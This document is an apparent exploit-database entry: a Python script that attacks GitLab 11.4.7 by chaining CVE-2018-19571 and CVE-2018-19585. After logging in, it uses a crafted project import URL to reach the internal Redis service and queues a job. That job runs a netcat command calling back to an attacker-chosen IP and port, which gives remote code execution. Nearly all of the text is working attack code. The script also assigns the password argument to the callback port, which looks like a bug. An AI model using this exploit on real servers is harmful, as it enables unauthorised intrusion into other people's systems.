GitLab 11.4.7 Remote Code Execution

`# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)  
# Date: 24th December 2020  
# Exploit Author: Sam Redmond  
# Software Link: https://gitlab.com/  
# Environment: GitLab 11.4.7, community edition  
# CVE: CVE-2018-19571 + CVE-2018-19585  
# Version: 11.4.7  
  
#!/usr/bin/python3  
  
import requests  
from bs4 import BeautifulSoup  
import argparse  
import random  
  
  
parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')  
parser.add_argument('-u', help='GitLab Username/Email', required=True)  
parser.add_argument('-p', help='Gitlab Password', required=True)  
parser.add_argument('-g', help='Gitlab URL (without port)', required=True)  
parser.add_argument('-l', help='reverse shell ip', required=True)  
parser.add_argument('-P', help='reverse shell port', required=True)  
args = parser.parse_args()  
  
username = args.u  
password = args.p  
gitlab_url = args.g + ":5080"  
local_ip = args.l  
local_port = args.p  
  
session = requests.Session()  
  
# Get Authentication Token  
r = session.get(gitlab_url + "/users/sign_in")  
soup = BeautifulSoup(r.text, features="lxml")  
token = soup.findAll('meta')[16].get("content")  
print(f"[+] authenticity_token: {token}")  
  
login_form = {  
"authenticity_token": token,  
"user[login]": username,  
"user[password]": password,  
"user[remember_me]": "0"  
}  
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)  
  
if r.status_code != 200:  
exit(f"Login Failed:{r.text}")  
  
# Create project  
import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git"  
project_name = f'project{random.randrange(1, 10000)}'  
project_url = f'{gitlab_url}/{username}'  
  
print(f"[+] Creating project with random name: {project_name}")  
  
form = """\nmulti  
sadd resque:gitlab:queues system_hook_push  
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"  
exec  
exec  
exec\n"""  
  
r = session.get(f"{gitlab_url}/projects/new")  
soup = BeautifulSoup(r.text, features="lxml")  
  
namespace_id = soup.find(  
'input', {'name': 'project[namespace_id]'}).get('value')  
  
project_token = soup.findAll('meta')[16].get("content")  
project_token = project_token.replace("==", "%3D%3D")  
project_token = project_token.replace("+", "%2B")  
  
payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"  
  
cookies = {  
'sidebar_collapsed': 'false',  
'event_filter': 'all',  
'hide_auto_devops_implicitly_enabled_banner_1': 'false',  
'_gitlab_session': session.cookies['_gitlab_session'],  
}  
  
headers = {  
'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Referer': f'{gitlab_url}/projects',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Content-Length': '398',  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1',  
}  
  
print("[+] Running Exploit")  
r = session.post(  
gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False)  
if "The change you requested was rejected." in r.text:  
exit('Exploit failed, check input params')  
  
print('[+] Exploit completed successfully!')  
  
  
`